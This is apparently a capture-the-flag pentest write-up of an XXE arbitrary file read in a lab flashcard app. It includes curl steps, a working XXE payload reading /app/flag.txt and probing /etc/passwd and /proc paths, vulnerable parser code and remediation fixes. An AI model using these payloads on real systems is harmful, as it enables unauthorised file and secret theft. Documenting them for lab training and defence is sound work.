Tanuki: Arbitrary File Read via XXE on XML Deck Import (2026-05-08 rotation)
Part 1 — Pentest Report
Executive Summary
Tanuki is a spaced repetition flashcard study app served from BugForge: React SPA + Express JSON API, Anki-derived SRS terminology, Japanese cultural framing. Users register, study seeded decks, and can import custom decks via file upload. The frontend file picker on the import page declares accept=".json,.xml", which surfaces an XML parser path the user-facing flow does not exercise. The XML parser resolves DOCTYPE-declared external entities and persists their expansion into the deck/card record, which is then echoed back via GET /api/decks/:id and GET /api/study/:deckId/cards.
Testing confirmed 1 finding:
| ID | Title | Severity | CVSS | CWE | Endpoint |
|---|---|---|---|---|---|
| F1 | XXE via XML Deck Import (External Entity Expansion) | High | 7.5 | CWE-611, CWE-827 | POST /api/decks/import |
The flag was retrieved by registering an account, mirroring a JSON deck shape into an XML body to confirm the parser path was live, then submitting an XML deck containing <!DOCTYPE deck [<!ENTITY xxe SYSTEM "file:///app/flag.txt">]> with &xxe; placed in the description and a card front. Reading the deck back via GET /api/study/:deckId/cards returned the entity-expanded card front, with the flag in plaintext.
This is a lab-name rotation of the prior tanuki XXE engagement (2026-03-17). Same lab name, same vuln class, different lab build. The container hint string pattern documented in the prior engagement (common recon paths return a decoy string instead of file content) applied directly here.
Objective
Capture the lab flag (BugForge bug{...} format) from the Tanuki spaced repetition flashcard app.
Scope / Initial Access
# Target Application
URL: https://lab-1778111135105-ut5hno.labs-app.bugforge.io
# Auth details
Registration: POST /api/register {username, email, password, full_name}
Token format: JWT HS256, payload {id, username, iat} (no role claim)
Starting privileges: anonymous (registration is open and unauthenticated)
Registration is fully open. The JWT it returns carries no role claim, so role is read server side from the user record on each authenticated request. GET /api/verify-token returns the full user record including role. The same JWT authorizes the deck import endpoint where the bug lives.
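The claim that the token carries no role can be checked by decoding its payload segment. The following is a minimal sketch, assuming Node.js 16 or later; `decodeJwtPayload` and `makeSampleToken` are hypothetical helper names, and the sample token is built locally with a placeholder signature and an illustrative `iat` value rather than taken from the lab.

```javascript
// Decode (NOT verify) the payload segment of a JWT to inspect its claims.
function decodeJwtPayload(token) {
  const parts = token.split('.');
  if (parts.length !== 3) {
    throw new Error('expected three dot-separated JWT segments');
  }
  // Buffer understands the base64url alphabet that JWT segments use.
  const json = Buffer.from(parts[1], 'base64url').toString('utf8');
  return JSON.parse(json);
}

// Hypothetical sample token for illustration; the signature is a placeholder.
function makeSampleToken(payload) {
  const enc = (obj) => Buffer.from(JSON.stringify(obj)).toString('base64url');
  return `${enc({ alg: 'HS256', typ: 'JWT' })}.${enc(payload)}.placeholder-signature`;
}

const claims = decodeJwtPayload(
  makeSampleToken({ id: 4, username: 'haxor', iat: 1700000000 })
);
console.log(claims, 'role' in claims ? 'role claim present' : 'no role claim');
```

Decoding without verification is enough for recon, because the goal is only to see which claims exist, not to trust them.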
Reconnaissance — Reading the Bundle for the Parser Inventory
Reconnaissance focused on the React bundle (/static/js/main.2a8c2eb1.js) and the response shapes from registration and the deck endpoints. The bundle was unminified enough to surface input element attributes, route paths, and the admin gate logic; no source maps were exposed.
- The import page’s file picker declares accept=".json,.xml". Two formats means two parsers wired server side. The user-facing flow (the docs and seeded UX) is JSON deck import; XML is the format that does not appear in the UX but is still wired in. That mismatch is the recon premise that promotes XXE to the top of the hypothesis board.
- The frontend renders the /admin link only when user.role === "admin". This is a frontend-side gate; the server side check is unknown until we hit /api/admin/* directly. Cheap to test in isolation.
- The JWT carries {id, username, iat} and no role claim. Role is fetched server side via GET /api/verify-token on app load. Same architecture as the prior bugforge-cheesy-does-it lab (template reuse), which suggests the same team’s authentication and authorization wiring patterns.
- Sequential integer IDs on decks, cards, and users. Our JWT id was 4, which means at least three accounts predated ours (likely admin and two seeded customers). IDOR is on the board but not the cheapest probe.
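Reading the accept list out of the bundle can be automated. The sketch below is one possible approach, not the method used during the engagement: `extractAcceptFormats` is a hypothetical helper, and the sample bundle string is invented to resemble compiled JSX, where the attribute usually appears as an object property rather than as HTML.

```javascript
// Collect every file-picker accept entry found in bundle text.
// Matches the HTML form (accept=".json,.xml") and the compiled JSX
// prop form (accept:".json,.xml").
function extractAcceptFormats(bundleText) {
  const pattern = /\baccept\s*[=:]\s*["']([^"']+)["']/g;
  const formats = new Set();
  for (const match of bundleText.matchAll(pattern)) {
    for (const entry of match[1].split(',')) {
      const trimmed = entry.trim().toLowerCase();
      if (trimmed) formats.add(trimmed);
    }
  }
  return [...formats];
}

// Invented sample resembling a minified React bundle fragment.
const sampleBundle =
  'e.createElement("input",{type:"file",accept:".json,.xml",onChange:t})';
console.log(extractAcceptFormats(sampleBundle));
```

Each entry in the returned list is a candidate parser on the server and can be treated as its own hypothesis.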
Application Architecture
| Component | Detail |
|---|---|
| Backend | Node.js / Express (X-Powered-By: Express on every response) |
| Frontend | React + Material-UI single page application (build hash main.2a8c2eb1.js, ~516KB) |
| Auth | JWT HS256, payload {id, username, iat}, no role claim |
| CORS | Access-Control-Allow-Origin: * on every response |
| Database | Relational, snake_case schema (card_count, cards_studied, user_id), sequential integer IDs |
API Surface
| Endpoint | Method | Auth | Notes |
|---|---|---|---|
| /api/register | POST | none | Open registration; field allowlist enforced server side |
| /api/login | POST | none | Returns {token, user} |
| /api/verify-token | GET | JWT | Returns user including role |
| /api/decks | GET | JWT | Lists three seeded decks (id 1, 2, 3) |
| /api/decks/:id | GET | JWT | Single deck details |
| /api/decks/import | POST | JWT | Multipart upload, accepts .json and .xml |
| /api/study/:deckId/cards | GET | JWT | Returns cards with front, back, SM-2 fields |
| /api/study/progress | POST | JWT | SM-2 review submission |
| /api/study/sessions | GET | JWT | Lists user’s own sessions |
| /api/stats | GET | JWT | Aggregate stats |
| /api/admin/users | * | admin | Server enforced role check (returns 403 for non-admin) |
| /api/admin/decks | * | admin | Server enforced role check |
| /api/admin/cards | * | admin | Server enforced role check |
Attack Chain Visualization
┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐
│ POST /register │ │ FE accept= │ │ Benign XML deck │ │ XML <!DOCTYPE> │ │ GET /api/study/ │
│ open register │──▶│ ".json,.xml" │──▶│ shape mirror │──▶│ &xxe; → │──▶│ N/cards reads │
│ → our JWT │ │ XML parser wired │ │ → parser alive │ │ /app/flag.txt │ │ flag in front │
└──────────────────┘ └──────────────────┘ └──────────────────┘ └──────────────────┘ └──────────────────┘
Findings
F1 — XXE via XML Deck Import (External Entity Expansion)
Severity: High
CVSS v3.1: 7.5 — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-611 (Improper Restriction of XML External Entity Reference), CWE-827 (Improper Control of Document Type Definition)
Endpoint: POST /api/decks/import
Authentication required: Yes (any registered user; registration is open)
Description
The deck import endpoint accepts XML files and parses them with a parser that resolves DOCTYPE-declared external entities. Entity references placed in deck or card fields (e.g. <description> or a card’s <front>) are expanded into the persisted record at parse time, then echoed back when the deck is read via GET /api/decks/:id or GET /api/study/:deckId/cards. Combined with file:// URIs in the SYSTEM identifier, this lets an attacker read arbitrary local files that the application user has read access to.
PR:N reflects open public registration: any unauthenticated party can register and reach the endpoint in two requests, so the chain effectively starts unauthenticated. C:H reflects the demonstrated arbitrary file read disclosing the lab flag at /app/flag.txt. I:N and A:N reflect that the demonstrated impact is read-only file access without integrity or availability degradation.
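The 7.5 score can be reproduced from the vector with the CVSS v3.1 base score equations. The sketch below covers only Scope:Unchanged vectors, which is all this finding needs; the function names are illustrative, and the metric weights are the ones published in the CVSS v3.1 specification.

```javascript
// CVSS v3.1 base score for Scope:Unchanged vectors.
const WEIGHTS = {
  AV: { N: 0.85, A: 0.62, L: 0.55, P: 0.2 },
  AC: { L: 0.77, H: 0.44 },
  PR: { N: 0.85, L: 0.62, H: 0.27 }, // Scope:Unchanged values only
  UI: { N: 0.85, R: 0.62 },
  C: { H: 0.56, L: 0.22, N: 0 },
  I: { H: 0.56, L: 0.22, N: 0 },
  A: { H: 0.56, L: 0.22, N: 0 },
};

// Round up to one decimal place, using the integer-based procedure from
// the specification to avoid floating point surprises.
function roundUp(value) {
  const scaled = Math.round(value * 100000);
  return scaled % 10000 === 0
    ? scaled / 100000
    : (Math.floor(scaled / 10000) + 1) / 10;
}

function baseScore(vector) {
  // Drop the "CVSS:3.1" prefix, then map "AV:N" style pairs into an object.
  const metrics = Object.fromEntries(
    vector.split('/').slice(1).map((pair) => pair.split(':'))
  );
  if (metrics.S !== 'U') throw new Error('this sketch only handles S:U');
  const w = (name) => {
    const value = WEIGHTS[name][metrics[name]];
    if (value === undefined) throw new Error(`unknown value for ${name}`);
    return value;
  };
  const iss = 1 - (1 - w('C')) * (1 - w('I')) * (1 - w('A'));
  const impact = 6.42 * iss;
  const exploitability = 8.22 * w('AV') * w('AC') * w('PR') * w('UI');
  return impact <= 0 ? 0 : roundUp(Math.min(impact + exploitability, 10));
}

console.log(baseScore('CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N')); // 7.5
```

Scoring the same vector with PR:L instead of PR:N yields 6.5, which shows how much the open registration argument contributes to the rating.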
Impact
Arbitrary local file read on the application container. The application user’s filesystem is exposed including any application-controlled secrets, source files, and configuration left in readable paths. The lab flag was disclosed from /app/flag.txt.
Reproduction
Step 1 — Register and capture the JWT
curl -sX POST https://lab-1778111135105-ut5hno.labs-app.bugforge.io/api/register \
-H 'Content-Type: application/json' \
-d '{"username":"haxor","email":"[email protected]","password":"password","full_name":""}'
# → 200 with {token, user}; our id is 4
Capture the token value as $TOKEN for subsequent requests.
Step 2 — Confirm the XML parser path is live
Before sending an entity-bearing payload, mirror the JSON deck shape into XML and submit a benign version. A clean import means the XML parser path is live, so the next request can carry the heavy payload.
<deck>
<name>XMLProbe</name>
<description>probe</description>
<category>Probe</category>
<cards>
<card><front>front1</front><back>back1</back></card>
</cards>
</deck>
curl -sX POST https://lab-…/api/decks/import \
-H "Authorization: Bearer $TOKEN" \
-F "[email protected];type=application/xml"
# → {"id":5,"message":"Deck imported successfully","cards_count":1}
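The shape mirroring in Step 2 can be scripted so the benign probe always matches the JSON structure exactly. This is a minimal sketch: `deckToXml` and `escapeXml` are hypothetical helpers, and the JSON deck shape (`name`, `description`, `category`, `cards` with `front` and `back`) is assumed from the element names in the probe above.

```javascript
// Escape the characters that would otherwise be read as XML markup,
// so the probe stays benign whatever the deck text contains.
function escapeXml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Mirror an (assumed) JSON deck shape into the equivalent XML document.
function deckToXml(deck) {
  const cards = deck.cards
    .map(
      (c) =>
        `    <card><front>${escapeXml(c.front)}</front>` +
        `<back>${escapeXml(c.back)}</back></card>`
    )
    .join('\n');
  return [
    '<deck>',
    `  <name>${escapeXml(deck.name)}</name>`,
    `  <description>${escapeXml(deck.description)}</description>`,
    `  <category>${escapeXml(deck.category)}</category>`,
    '  <cards>',
    cards,
    '  </cards>',
    '</deck>',
  ].join('\n');
}

const probeXml = deckToXml({
  name: 'XMLProbe',
  description: 'probe',
  category: 'Probe',
  cards: [{ front: 'front1', back: 'back1' }],
});
console.log(probeXml);
```

Because the output carries no DOCTYPE and no entity references, a clean import says something about the parser path only, not about entity handling.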
Step 3 — Submit an XXE payload targeting the flag
<?xml version="1.0"?>
<!DOCTYPE deck [<!ENTITY xxe SYSTEM "file:///app/flag.txt">]>
<deck>
<name>x</name>
<description>flag:&xxe;</description>
<category>x</category>
<cards>
<card><front>flag-front:&xxe;</front><back>x</back></card>
</cards>
</deck>
curl -sX POST https://lab-…/api/decks/import \
-H "Authorization: Bearer $TOKEN" \
-F "[email protected];type=application/xml"
# → {"id":6,"message":"Deck imported successfully","cards_count":1}
Step 4 — Read the deck back to recover the entity expansion
curl -s -H "Authorization: Bearer $TOKEN" https://lab-…/api/study/6/cards
# → {"front":"flag-front:bug{wlOG9b2NIVNP7JHbNZVr0dQQoTBB0cJA}", ...}
Flag: bug{wlOG9b2NIVNP7JHbNZVr0dQQoTBB0cJA}
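Spotting the flag in the read-back can be reduced to a pattern match on the card fields. The sketch below assumes the study endpoint returns an array of card objects with `front` and `back` strings (the full response shape is abbreviated above), and it uses a placeholder flag value rather than the real one.

```javascript
// BugForge flags follow the bug{...} format stated in the Objective.
const FLAG_PATTERN = /bug\{[^}]+\}/g;

// Scan the front and back of every card for flag-shaped strings.
function findFlags(cards) {
  const hits = [];
  for (const card of cards) {
    for (const field of ['front', 'back']) {
      const matches = String(card[field] ?? '').match(FLAG_PATTERN) ?? [];
      for (const flag of matches) hits.push({ field, flag });
    }
  }
  return hits;
}

// Placeholder data shaped like the Step 4 response.
const sampleCards = [{ front: 'flag-front:bug{EXAMPLE}', back: 'x' }];
console.log(findFlags(sampleCards));
```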
Container Note
The application container has been built with several common recon paths replaced. /etc/passwd, /proc/self/cmdline, /proc/self/cwd/package.json, and /app/package.json all return the literal string “Flag is in a different file” rather than the expected file content. This is a hint string indicator, not a sandbox: the entity reference resolves and a string is returned, but the string is the lab author’s intentional decoy. The /app/flag.txt path is left untouched and reads cleanly. Pivoting from system paths to app paths via a batched 5-entity scan in one DOCTYPE landed the flag on the second exploit request. The pattern was previously documented from the 2026-03-17 tanuki engagement and applied directly here.
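The batched scan and the decoy check described in this note can be sketched as two small helpers. Everything here is illustrative: `buildBatchedScan` and `triage` are hypothetical names, the `path|content` card layout is an assumption made so results can be attributed to a path, and some parsers may reject the whole document when a single entity fails to resolve.

```javascript
// Hint string the lab returns for decoy paths (quoted from this note).
const HINT = 'Flag is in a different file';

// Build one XML deck that declares an entity per candidate path and
// places each entity in its own card, prefixed with the path it reads.
function buildBatchedScan(paths) {
  const entities = paths
    .map((p, i) => `  <!ENTITY e${i} SYSTEM "file://${p}">`)
    .join('\n');
  const cards = paths
    .map((p, i) => `    <card><front>${p}|&e${i};</front><back>x</back></card>`)
    .join('\n');
  return [
    '<?xml version="1.0"?>',
    '<!DOCTYPE deck [',
    entities,
    ']>',
    '<deck>',
    '  <name>scan</name>',
    '  <description>scan</description>',
    '  <category>scan</category>',
    '  <cards>',
    cards,
    '  </cards>',
    '</deck>',
  ].join('\n');
}

// Sort the cards read back from the study endpoint into decoys and reads.
function triage(cards) {
  return cards.map(({ front }) => {
    const sep = front.indexOf('|');
    const content = front.slice(sep + 1);
    const verdict =
      content === '' ? 'empty' : content.includes(HINT) ? 'decoy' : 'read';
    return { path: front.slice(0, sep), verdict };
  });
}

const scanXml = buildBatchedScan(['/etc/passwd', '/app/flag.txt']);
console.log(scanXml);
```

A `decoy` verdict still proves that entity resolution works, so it is a reason to change paths rather than to abandon the technique.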
Remediation
Fix 1 — Reject DTD declarations and disable entity expansion
// BEFORE (Vulnerable)
const libxml = require('libxmljs');
app.post('/api/decks/import', upload.single('file'), (req, res) => {
const xmlBody = req.file.buffer.toString();
const doc = libxml.parseXml(xmlBody, { noent: true }); // noent: true substitutes entities, including external ones
const deck = parseDeckFromXml(doc);
saveDeck(deck);
res.json({ id: deck.id, message: 'Deck imported successfully' });
});
// AFTER (Secure)
const libxml = require('libxmljs');
app.post('/api/decks/import', upload.single('file'), (req, res) => {
const xmlBody = req.file.buffer.toString();
// Reject any DTD or entity declarations before parsing
if (/<!DOCTYPE|<!ENTITY/i.test(xmlBody)) {
return res.status(400).json({ error: 'DTD declarations are not permitted' });
}
const doc = libxml.parseXml(xmlBody, {
noent: false, // do not substitute entity references
noblanks: true,
recover: false
});
// Allowlist deck fields at the deserialization boundary
const deck = {
name: doc.get('//name')?.text(),
description: doc.get('//description')?.text(),
category: doc.get('//category')?.text(),
cards: extractCards(doc)
};
saveDeck(deck);
res.json({ id: deck.id, message: 'Deck imported successfully' });
});
The pre-parse reject pattern catches DOCTYPE before it hits the parser. The parser flags ensure that even if a DOCTYPE slips past the regex (for example, in a UTF-16 encoded upload, where the string decoded as UTF-8 never contains the literal text), entity references are not substituted.
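One way to make the pre-parse check harder to sidestep is to decode the upload according to its byte order mark before testing it. The sketch below is a heuristic under stated assumptions, not a complete defense: `decodeXmlBuffer` and `hasForbiddenDtd` are hypothetical helpers, only UTF-8 and BOM-prefixed UTF-16 are handled, and anything containing NUL bytes without a BOM is refused outright.

```javascript
// Decode an uploaded buffer to text, honoring a UTF-16 byte order mark.
// Returns null when the bytes look like an encoding this sketch does not handle.
function decodeXmlBuffer(buf) {
  if (buf.length >= 2 && buf[0] === 0xff && buf[1] === 0xfe) {
    return new TextDecoder('utf-16le').decode(buf);
  }
  if (buf.length >= 2 && buf[0] === 0xfe && buf[1] === 0xff) {
    return new TextDecoder('utf-16be').decode(buf);
  }
  // NUL bytes without a BOM suggest an undeclared multi-byte encoding.
  if (buf.includes(0x00)) return null;
  return buf.toString('utf8');
}

// True when the upload should be rejected before it reaches the XML parser.
function hasForbiddenDtd(buf) {
  const text = decodeXmlBuffer(buf);
  return text === null || /<!DOCTYPE|<!ENTITY/i.test(text);
}

const utf16Payload = Buffer.concat([
  Buffer.from([0xff, 0xfe]), // UTF-16LE byte order mark
  Buffer.from('<!DOCTYPE deck [<!ENTITY x "y">]><deck/>', 'utf16le'),
]);

// The naive check on the UTF-8 decoded string misses the UTF-16 payload.
console.log(/<!DOCTYPE/i.test(utf16Payload.toString()), hasForbiddenDtd(utf16Payload));
```

The parser flags remain the primary control; a check like this only narrows what reaches them.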
Fix 2 — Drop the XML format from the file picker if not needed
The user-facing flow is JSON deck import. If XML support is not a product requirement, remove .xml from the accept= attribute and reject XML server side too. Reducing the parser inventory removes the attack class entirely, which is strictly safer than hardening a parser for a format that no user actually needs.
Fix 3 — Sandbox the application user’s filesystem
Even with parser hardening, the application container should not have readable secrets sitting in /app. Move secrets to environment variables or an external secret store. Mount the application directory read-only where possible. Treat any arbitrary file read as the floor for impact; a hardened filesystem layout limits how bad that floor is.
Additional recommendations:
- Validate uploaded files against an extension and content type allowlist before opening them with a parser. A .xml filename with a JSON body, or a .json filename with an XML body, should be rejected on the basis of the extension/content type mismatch.
- If multi-format deck import is a requirement, document the supported parsers in an upload spec and harden each one explicitly. Multi-format file upload is a single feature with multiple attack classes; the hardening checklist should be explicit per format.
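The mismatch check in the first recommendation can be sketched as a comparison of three signals: the filename extension, the declared content type, and a sniff of the first meaningful character. `sniffFormat` and `checkUpload` are hypothetical helpers, the content type list is an assumption, and the sniff is deliberately crude.

```javascript
const path = require('node:path');

// Allowlists are Maps so that keys such as "constructor" cannot match.
const FORMAT_BY_EXT = new Map([['.json', 'json'], ['.xml', 'xml']]);
const FORMAT_BY_TYPE = new Map([
  ['application/json', 'json'],
  ['application/xml', 'xml'],
  ['text/xml', 'xml'],
]);

// Guess the format from the first non-whitespace character of the body.
function sniffFormat(buffer) {
  const text = buffer.toString('utf8').replace(/^\uFEFF/, '').trimStart();
  if (text.startsWith('<')) return 'xml';
  if (text.startsWith('{') || text.startsWith('[')) return 'json';
  return 'unknown';
}

// Accept the upload only when extension, declared type, and content agree.
function checkUpload(filename, declaredType, buffer) {
  const byExt = FORMAT_BY_EXT.get(path.extname(filename).toLowerCase());
  const byType = FORMAT_BY_TYPE.get(declaredType);
  if (!byExt || !byType) {
    return { ok: false, reason: 'extension or content type not on the allowlist' };
  }
  if (byExt !== byType || byExt !== sniffFormat(buffer)) {
    return { ok: false, reason: 'extension, content type, and body disagree' };
  }
  return { ok: true, format: byExt };
}

console.log(checkUpload('deck.xml', 'application/xml', Buffer.from('{"name":"x"}')));
```

Returning the agreed format lets the caller dispatch to exactly one parser instead of guessing from the filename.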
OWASP Top 10 Coverage
- A03:2021 — Injection: XXE is a server-side injection in which attacker-supplied parser directives (entity declarations and references) turn document data into a file read. The XML deck body is data, but the DOCTYPE is parser instruction.
- A05:2021 — Security Misconfiguration: The XML parser is configured with permissive entity resolution; the 2021 list folds the former A4:2017 XXE category into this one. The multi-format file upload exposes a parser that the user-facing flow does not need.
- A04:2021 — Insecure Design: The import surface ships with no parser hardening or per-format threat model. The frontend accept= attribute advertises an attack surface that did not need to exist.
Tools Used
| Tool | Purpose |
|---|---|
| Caido | Proxy for crafting and replaying multipart uploads with arbitrary inner Content-Type |
| curl | Reproducible request flow documented in the writeup |
| Browser DevTools | Bundle reading (/static/js/main.2a8c2eb1.js) for the accept= attribute and route inspection |
| Discovered skill xxe-container-file-enumeration | Pattern from a prior tanuki engagement: container hint string indicator + batched entity scan across candidate app paths |
References
- CWE-611: https://cwe.mitre.org/data/definitions/611.html
- CWE-827: https://cwe.mitre.org/data/definitions/827.html
- OWASP XML External Entity Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
- OWASP A03:2021 Injection: https://owasp.org/Top10/A03_2021-Injection/
- Prior tanuki XXE writeup (2026-03-17): tanuki-xxe.md
Part 2 — Notes / Knowledge
Key Learnings
- A multi-format file upload runs one parser per format, and every format on that list is its own attack class. XML invites XXE, YAML invites deserialization, archives invite zip slip, JSON invites prototype pollution and mass assignment, CSV invites formula injection. The frontend input’s accept= attribute is the cheapest signal of which formats are wired. Read it during recon, treat each entry as a separate hypothesis, and don’t default to the format the docs or UX show.
- Send a parser-alive probe before any heavy parser-target payload. Mirror the documented shape (often the JSON example) into the candidate format and submit a benign version. Clean import means the parser is wired; send the attack payload next request. Format-specific 400 means parser alive but rejecting your shape; iterate. Generic “unsupported file type” means the parser is inactive for this format; move on. Applies to XXE, deserialization, prototype pollution, zip slip, formula injection: anywhere a heavy probe risks burning against a dead branch.
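The three probe outcomes in the second learning can be written down as a small decision function. This is a sketch only: `classifyProbe` is a hypothetical helper, and the error wording it matches is an assumption, since this lab only ever returned the success case.

```javascript
// Map a probe response onto the outcomes described above.
function classifyProbe(status, body) {
  const message = JSON.stringify(body ?? '').toLowerCase();
  // Clean import: the parser for this format is wired in.
  if (status >= 200 && status < 300) return 'alive';
  // Generic rejection of the format itself: nothing to attack on this branch.
  if (/unsupported (file )?(type|format)/.test(message)) return 'inactive';
  // Format-specific complaint: the parser ran but disliked the shape.
  if (status === 400) return 'alive-rejecting';
  return 'unknown';
}

console.log(
  classifyProbe(200, { id: 5, message: 'Deck imported successfully', cards_count: 1 })
);
```

Only the `alive` and `alive-rejecting` outcomes justify spending a heavier payload on the branch.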
Failed Approaches
| Approach | Result | Why It Failed |
|---|---|---|
| Direct GET /api/admin/users with a non-admin JWT (frontend-only admin gate hypothesis) | 403 Forbidden, body {"error":"Admin access required"} | Server enforces role server side. Same template wiring as bugforge-cheesy-does-it (identical error string). |
| Mass assignment of role:"admin" on POST /api/register | Server returns user object without echoing role; /api/verify-token confirms role:"user" on the resulting JWT | Register handler applies a field allowlist; arbitrary fields in the body are dropped. |
| First XXE attempt with file:///etc/passwd and other system paths (/proc/self/cmdline, /proc/self/cwd/package.json, /app/package.json) | All four returned the literal string “Flag is in a different file” rather than the expected file content | Container build replaces popular recon paths with a hint string. The pivot to the flag direct path (/app/flag.txt) was the load-bearing step. |
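The allowlist behavior that defeated the mass assignment attempt can be illustrated in a few lines. The register handler's real code was not available, so this is an assumed reconstruction: `pickAllowed` is a hypothetical helper, and the field list is taken from the registration request shown under Auth details.

```javascript
// Fields the registration request is documented to accept.
const REGISTER_FIELDS = ['username', 'email', 'password', 'full_name'];

// Copy only allowlisted own properties; anything else is silently dropped.
function pickAllowed(body, allowed) {
  const out = {};
  for (const key of allowed) {
    if (Object.prototype.hasOwnProperty.call(body, key)) out[key] = body[key];
  }
  return out;
}

const attempted = { username: 'haxor', password: 'password', role: 'admin' };
console.log(pickAllowed(attempted, REGISTER_FIELDS));
```

With a handler shaped like this, the extra `role` field never reaches the user record, which matches the role:"user" result from /api/verify-token.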
Tags: #bugforge #webapp #xxe #file-upload #xml #multipart #parser-alive-probe #container-hint #cwe-611 #cwe-827
Document Version: 1.0
Last Updated: 2026-05-08